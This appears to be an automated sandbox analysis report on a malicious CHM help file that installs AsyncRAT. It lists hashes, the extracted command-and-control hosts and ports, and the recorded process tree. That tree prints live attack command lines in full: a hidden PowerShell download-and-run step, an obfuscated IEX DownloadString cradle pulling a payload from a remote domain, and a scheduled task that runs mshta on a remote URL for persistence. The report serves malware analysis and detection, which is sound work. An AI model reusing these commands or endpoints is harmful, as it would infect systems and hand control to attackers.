Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
21/03/2023, 10:42
Static task
static1
Behavioral task
behavioral1
Sample
RG.chm
Resource
win7-20230220-en
General
-
Target
RG.chm
-
Size
190KB
-
MD5
9d9a0a119044c6a83d533a1941bb64c5
-
SHA1
279387ccf49c5f71c99f8b89b333be4a70f6cab6
-
SHA256
83a1b442bf9761f33881468eb8be300e18c5c12691eb52681efee2c4c5842a06
-
SHA512
31c4edbcff416df4cada81dbd1e3bdc752cb8a74c837787feba01d9e93e00970b15efac6bf70548b8ba1811cf7e7522bbd64cfe0572d5619759b8069b5b399b2
-
SSDEEP
3072:Xg4C8YLEo5xuIvDocDWjc/pgDXQgKpacezvRBDobwrArHMp1G6/AirUIKX6MA:XpYIW0UY8pTxp/mjmqArYRQIKX5A
Malware Config
Extracted
asyncrat
- By Dimas Rodrigues
2023
clsuplementos.ddns.net:1110
clsuplementos.ddns.net:2220
clsuplementos.ddns.net:3330
clsuplementos.ddns.net:4440
clsuplementos.ddns.net:5550
clsuplementos.ddns.net:6660
clsuplementos.ddns.net:7770
clsuplementos.ddns.net:8880
clsuplementos.ddns.net:9990
handling.ddns.net:1110
handling.ddns.net:2220
handling.ddns.net:3330
handling.ddns.net:4440
handling.ddns.net:5550
handling.ddns.net:6660
handling.ddns.net:7770
handling.ddns.net:8880
handling.ddns.net:9990
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/496-185-0x0000000000400000-0x0000000000416000-memory.dmp asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 16 1380 powershell.exe 21 3284 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3284 set thread context of 496 3284 powershell.exe 96 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1284 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1380 powershell.exe 1380 powershell.exe 3284 powershell.exe 3284 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1380 powershell.exe Token: SeDebugPrivilege 3284 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3188 hh.exe 3188 hh.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 3188 wrote to memory of 1380 3188 hh.exe 87 PID 3188 wrote to memory of 1380 3188 hh.exe 87 PID 1380 wrote to memory of 3644 1380 powershell.exe 89 PID 1380 wrote to memory of 3644 1380 powershell.exe 89 PID 1380 wrote to memory of 3644 1380 powershell.exe 89 PID 3644 wrote to memory of 3284 3644 mshta.exe 90 PID 3644 wrote to memory of 3284 3644 mshta.exe 90 PID 3644 wrote to memory of 3284 3644 mshta.exe 90 PID 3644 wrote to memory of 1828 3644 mshta.exe 92 PID 3644 wrote to memory of 1828 3644 mshta.exe 92 PID 3644 wrote to memory of 1828 3644 mshta.exe 92 PID 1828 wrote to memory of 1284 1828 cmd.exe 94 PID 1828 wrote to memory of 1284 1828 cmd.exe 94 PID 1828 wrote to memory of 1284 1828 cmd.exe 94 PID 3284 wrote to memory of 496 3284 powershell.exe 96 PID 3284 wrote to memory of 496 3284 powershell.exe 96 PID 3284 wrote to memory of 496 3284 powershell.exe 96 PID 3284 wrote to memory of 496 3284 powershell.exe 96 PID 3284 wrote to memory of 496 3284 powershell.exe 96 PID 3284 wrote to memory of 496 3284 powershell.exe 96 PID 3284 wrote to memory of 496 3284 powershell.exe 96 PID 3284 wrote to memory of 496 3284 powershell.exe 96
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\RG.chm1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden wget 'https://meubooking.com.br/2023/reservations.php?file=edce4301c8d01cf9b904be.html' -OutFile 'C:\Users\Public\win32.hta'; Start-Process 'C:\Users\Public\win32.hta'2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\win32.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command <#-------------#>$Ojbd='<#-------------#>IEX(N`e`w-Object Net.W';<#-------------#>$t2='ebClient).Downlo';<#-------------#>$t3='t4(''https://corpolevesuplementos.com.br/2022pws/assyncpws.jpg'')'.Replace('t4','adString');Sleep(5);IEX(<#-------------#>$Ojbd+<#-------------#>$t2+<#-------------#>$t3)4⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"5⤵PID:496
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min schtasks /create /sc MINUTE /mo 180 /tn "BfeOnServiceStartTypeChange{9E67695A-30C6-420C-9ACF-8734ABFB9710}" /tr "\"mshta\"https://corpolevesuplementos.com.br/2022pws/assdirect.html" /F4⤵
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc MINUTE /mo 180 /tn "BfeOnServiceStartTypeChange{9E67695A-30C6-420C-9ACF-8734ABFB9710}" /tr "\"mshta\"https://corpolevesuplementos.com.br/2022pws/assdirect.html" /F5⤵
- Creates scheduled task(s)
PID:1284
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD570595b5937369a2592a524db67e208d3
SHA1d989b934d9388104189f365694e794835aa6f52f
SHA256be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8
SHA512edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
254KB
MD59d447d72b85eca4c58a5b14dbb170e01
SHA19c39245d5b40e4815d006ce6fe402e7ec26e0045
SHA256388e1f36d35dcbe4675821f4104514f66bcefdee33752acad874e45bdf44499a
SHA512c7d9a77a78f1ee3dec93d288bbcd774f4667778970012cdbd4b0b0835ca29dc8717d9c90c07c79847e13483eb1057e039dae13777a33d1f157baa1d5e227c5f2